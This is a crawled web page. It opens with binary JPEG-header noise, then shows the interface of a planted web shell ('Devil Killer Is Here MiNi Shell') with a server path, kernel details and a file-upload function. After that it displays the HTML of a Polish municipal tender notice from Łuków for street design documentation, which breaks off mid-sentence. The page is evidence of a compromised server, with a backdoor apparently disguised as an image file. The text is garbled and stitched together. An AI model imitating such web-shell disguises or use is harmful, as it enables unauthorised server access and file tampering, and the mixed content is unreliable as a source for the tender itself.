JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220125/0003424501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Aktualizacja dokumentacji technicznej dla budowy ulicy Rurowej oraz opracowanie dokumentacji technicznej na budowę ulicy Brzozowej w Łukowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Łuków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582380</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.lukow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lukow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Aktualizacja dokumentacji technicznej dla budowy ulicy Rurowej oraz opracowanie dokumentacji technicznej na budowę ulicy Brzozowej w Łukowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19d5273c-7dcd-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00034245</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017210/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji technicznej na budowę ulic Brzozowej i Rurowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/um.lukow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/um.lukow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji zawarte są w Tomie I SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związkuz przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Łuków, ul. Piłsudskiego 17 21-400 Łuków, sekretariat@um.lukow.pl<br/>	inspektorem ochrony danych w Urzędzie Miasta Łuków jest Pan Łukasz Kuśmierczak, lkusmierczak@um.lukow.pl, zastępcą Inspektora Ochrony Danych jest Alicja Miszta, adres e-mail: iod@um.lukow.pl. <br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na zamawiającym jako jednostce sektora finansów publicznych.<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14. RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 Nazwa: Aktualizacja dokumentacji technicznej dla budowy ulicy Rurowej.<br/>6.1.	Przedmiotem zamówienia jest opracowanie stanowiące aktualizację dokumentacji technicznej dla budowy ulicy Rurowej w m. Łuków pod względem zmiany ograniczającej zakres rzeczowy realizacji w odniesieniu do odcinka o długości ok. 738 metrów ( od skrzyżowania z ul. Sosnową <br/>do skrzyżowania z ul. Farfak). Przedmiot zamówienia obejmuje opracowanie dokumentacji technicznej, uzyskanie wszelkich niezbędnych decyzji i opinii, uzgodnień z gestorami sieci infrastruktury technicznej dla potrzeb wydania decyzji zezwolenia na realizację inwestycji przez Starostę Powiatowego. Opracowanie nastąpi w ramach zadania inwestycyjnego : „Budowa ul. Rurowej w m. Łuków” w oparciu o warunki wydane przez Zarząd Dróg Miejskich w Łukowie, w tym:<br/>6.1.1.	przyjąć konstrukcję nawierzchni jezdni dla kategorii ruchu KR – 3, szerokości jezdni 6,0m oraz przekrój uliczny;<br/>6.1.2.	ciągi pieszo-rowerowe zaprojektować jako przylegające do granicy pasa drogowego;<br/>6.1.3.	zapewnić odwodnienie projektowanej drogi poprzez zaprojektowanie kanału deszczowego z uwzględnieniem podłączenia ulic przyległych ( ul. Sosnowa i ul. Tartaczna) z odprowadzeniem do rzeki Krzna Północna - preferowany przebieg kanału kanalizacji deszczowej w granicach administracyjnych miasta Łuków;<br/>6.1.4.	ulicę zaprojektować z uwzględnieniem oświetlenia ulicznego w technologii LED <br/>z dostosowaniem do istniejącego systemu;<br/>6.1.5.	zapewnić dwie zatoki postojowe dla komunikacji miejskiej;<br/>6.1.6.	początek opracowania na wysokości granicy działek o nr ewid. 2985 i 2605, koniec opracowania to włącznie do ul. Farfak;<br/>6.1.7.	konieczne nawiązanie do rozwiązań technicznych w posiadanej dokumentacji <br/>na ul. Sosnową i ul. Tartaczną;<br/>6.1.8.	kanał technologiczny oraz dodatkowe studnie rewizyjne należy zaprojektować wg warunków technicznych wydanych przez Zarząd Dróg Miejskich;<br/>6.1.9.	ewentualne zaprojektowanie pompowni dla wód opadowych jako integralnej części kanalizacji deszczowej z uwzględnieniem osadnika poziomego i zbiorników retencyjnych;<br/>6.1.10.	opracowany projekt uzgodnić z Zarządem Dróg Miejskich w Łukowie;<br/>6.1.11.	ewentualnie w miarę potrzeb zaktualizować operat wodno-prawny i uzyskać <br/>w imieniu Zamawiającego decyzję wodnoprawną;<br/>6.1.12.	z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych;<br/>6.2.	Zakres prac objętych zamówieniem:<br/>6.2.1.	Aktualizacja dokumentacji technicznej będącej w posiadaniu Zamawiającego <br/>do obowiązujących przepisów przy ograniczonym zakresie rzeczowym w oparciu <br/>o rozwiązania techniczne zawarte w Projekcie Budowlanym będącym w posiadaniu przez Zamawiającego i dostosowanie go do obowiązujących przepisów przy jednoczesnym uwzględnieniu dokumentów z geodezyjnego poddziału działek pod realizację zamierzenia budowlanego będących również w posiadaniu przez Zamawiającego.<br/>6.2.2.	Zamawiający zastrzega sobie przed złożeniem dokumentacji do uzgodnień ZUD, <br/>z gestorami sieci i wszelkich innych opinii przedłożenie rozwiązań projektowych celem ich omówienia i porównania do posiadanej dokumentacji. Wszelkie zmiany w formie uzgodnienia odbiegające z obecnej dokumentacji musza być skonsultowane <br/>z Zamawiającym przed uzyskaniem zgód i opinii. <br/>Wszystkie dokumenty winny być opracowane w oparciu o ustawę z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tj. Dz.U. z 2020r., poz. 1363), o ile nastąpi konieczność poszerzenia obecnego pasa drogowego.<br/>6.2.3.	Wykonanie dokumentacji technicznej wraz z wszelkimi opiniami i uzgodnieniami niezbędnymi do uzyskania decyzji zezwolenia na realizację inwestycji drogowej (ZRID). Dokumentacja winna zawierać opracowania w branży drogowej, sanitarnej, gazowej, teletechnicznej, elektrycznej. W skład opracowania obowiązkowych dokumentacji przewidzianych rozporządzeniem m.in.: <br/>	projekt techniczny - 4 egz. w wersji papierowej + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg. <br/>	projekt architektoniczno-budowlany – 6 egz. w wersji papierowej + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg. <br/>	projekt zagospodarowanie terenu - 6 egz. w wersji papierowej + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg<br/>	dokumentacje branżowe usunięcia kolizji, o ile takowe wystąpią. <br/>6.2.4.	Opracowanie projektu wycinki drzew i krzewów – 4 egz. wersja papierowa + 1 egz. <br/>w formie elektronicznej w formatach: .pdf oraz .dwg;<br/>6.2.5.	Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych: 3 egz. wersja papierowa + 2 egz. w formie elektronicznej w formatach: doc lub .pdf;<br/>6.2.6.	Opracowanie kosztorysu inwestorskiego wraz z przedmiarem robót w rozbiciu <br/>na poszczególne branże – 3 egz. wersja papierowa + 2 egz. w formie elektronicznej opracowanej w formatach: pdf oraz w programie kosztorysowym *ath;<br/>6.2.7.	Opracowanie projektu czasowej i stałej organizacji ruchu – 5 egz. wersja papierowa + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg.<br/>6.3.	Dokumentacja winna być wykonana w formie pisemnej oraz dodatkowo w formie elektronicznej na nośniku CD/DVD.<br/>6.4.	Dokumentacje Wykonawca zobowiązany jest wykonać zgodnie z przepisami:<br/>6.4.1.	ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj.Dz. U. z 2021 r. poz. 2351 ze zm.);<br/>6.4.2.	Rozporządzenia Ministra Rozwoju w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia z dnia 11 września 2020 r. (Dz. U. z 2020 r. poz. 1609 z późn. zm.);<br/>6.4.3.	Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania kosztów prac projektowych oraz planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym <br/>(Dz.U. 2021 poz. 2458 ze zm.);<br/>6.4.4.	a także zgodnie z wszystkimi innymi przepisami i normami obowiązującymi na terenie Rzeczypospolitej Polskiej.<br/>6.5.	Wykonawca zobowiązuje się do sprawowania nadzoru autorskiego nad realizacją zaprojektowanych robót budowlanych, w okresie ich realizacji. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 84035,24 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">270 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 Nazwa: Opracowanie dokumentacji technicznej na budowę ulicy Brzozowej w Łukowie<br/>6.6.	Przedmiotem zamówienia jest: opracowanie projektu budowlanego wg Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2020 poz. 1609 ze zm.) budowy ulicy Brzozowej o długości ok. 592 m w ramach zadania inwestycyjnego: „Opracowanie dokumentacji technicznej na budowę <br/>ul. Brzozowej w m. Łuków”. Przygotować należy niezbędne dokumenty, decyzje i opinie niezbędne do uzyskania decyzji zezwolenia na realizację inwestycji. Zadanie należy wykonać zgodnie z warunkami wydanymi przez Zarząd Dróg Miejskich w Łukowie, w tym:<br/>6.6.1.	przyjąć konstrukcję nawierzchni jezdni dla kategorii ruchu KR – 3, szerokości jezdni 5,5m;<br/>6.6.2.	krawędzie jezdni obramować opornikiem;<br/>6.6.3.	ciąg pieszy zaprojektować tak, aby przylegał do granicy pasa drogowego po stronie większej liczby zabudowanych posesji;<br/>6.6.4.	zastosować powierzchniowe odwodnienie projektowanej drogi;<br/>6.6.5.	początek opracowania to połączenie ul. Brzozowej z ul. Międzyrzecką, koniec opracowania przewiduje się na wysokości działki o nr ewid. 3214/38;<br/>6.6.6.	w projekcie stałej organizacji ruchu oznakowanie poziome należy przewidzieć jako grubowarstwowe;<br/>6.6.7.	opracowany projekt uzgodnić z Zarządem Dróg Miejskich w Łukowie;<br/>6.6.8.	w miarę potrzeb opracować operat wodno-prawny i uzyskać w imieniu Zamawiającego decyzję wodnoprawną;<br/>z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych.<br/>6.7.	Zakres prac objętych zamówieniem:<br/>6.7.1.	Wykonanie projektu koncepcyjnego w zakresie drogowym, składającego się z części graficznej (mapa w skali co najmniej 1:5000 przedstawiająca proponowany przebieg drogi, z zaznaczeniem terenu niezbędnego dla obiektów budowlanych, oraz istniejącego uzbrojenie terenu) oraz części opisowej, analizy powiązania drogi z innymi drogami publicznymi, mapy zawierającej projekt podziału nieruchomości sporządzonej zgodnie z obowiązującymi przepisami, zestawienia określającego nieruchomości lub ich części, które są planowane do przejęcia na rzecz Miasta Łuków, zestawienia określającego nieruchomości lub ich części, z których korzystanie będzie ograniczone, określenia zmian w dotychczasowej infrastrukturze zagospodarowania terenu – 4 egz. + 1 egz. w formie elektronicznej. Wszystkie dokumenty winny być opracowane w oparciu o ustawę z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tj. Dz.U. z 2020r., poz. 1363 ze zm.), o ile nastąpi konieczność poszerzenia obecnego pasa drogowego.<br/>6.7.2.	Wykonanie dokumentacji geotechnicznej celem określenia podłoża gruntowego pod projektowaną ulicą.<br/>6.7.3.	Uzyskanie wypisów z ewidencji gruntów dla działek, na których zlokalizowana będzie inwestycja. Przewiduje się ok. 12 podziałów działek. Ewentualna zmiana ilości działek ewidencyjnych do podziału stanowi ryzyko podjęte przez Wykonawcę.<br/>6.7.4.	Wykonanie dokumentacji technicznej wraz z wszelkimi opiniami i uzgodnieniami niezbędnymi do uzyskania decyzji zezwolenia na realizację inwestycji drogowej (ZRID). Dokumentacja winna zawierać opracowania w branży drogowej, sanitarnej, gazowej, teletechnicznej, elektrycznej. W skład opracowania obowiązkowych dokumentacji przewidzianych rozporządzeniem m.in.:<br/>	projekt techniczny - 4 egz. w wersji papierowej + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg. <br/>	projekt architektoniczno-budowlany – 6 egz. w wersji papierowej + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg. <br/>	projekt zagospodarowanie terenu - 6 egz. w wersji papierowej + 2 egz. w formie elektronicznej opracowanej w formatach: .pdf oraz .dwg<br/>	dokumentacje branżowe usunięcia kolizji, o ile takowe wystąpią. <br/>6.7.5.	Opracowanie projektu wycinki drzew i krzewów – 4 egz. wersja papierowa + 1 egz. w formie elektronicznej w formatach: .pdf oraz .dwg w razie potrzeby, jeżeli jest wymagana;<br/>6.7.6.	Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych: 3 egz. wersja papierowa + 2 egz. w formie elektronicznej w formatach: doc lub .pdf;<br/>6.7.7.	Opracowanie kosztorysu inwestorskiego wraz z przedmiarem robót w rozbiciu na poszczególne branże – 3 egz. wersja papierowa + 2 egz. w formie elektronicznej opracowanej w formatach: pdf oraz w programie kosztorysowym *ath;<br/>6.7.8.	Opracowanie projektu czasowej i 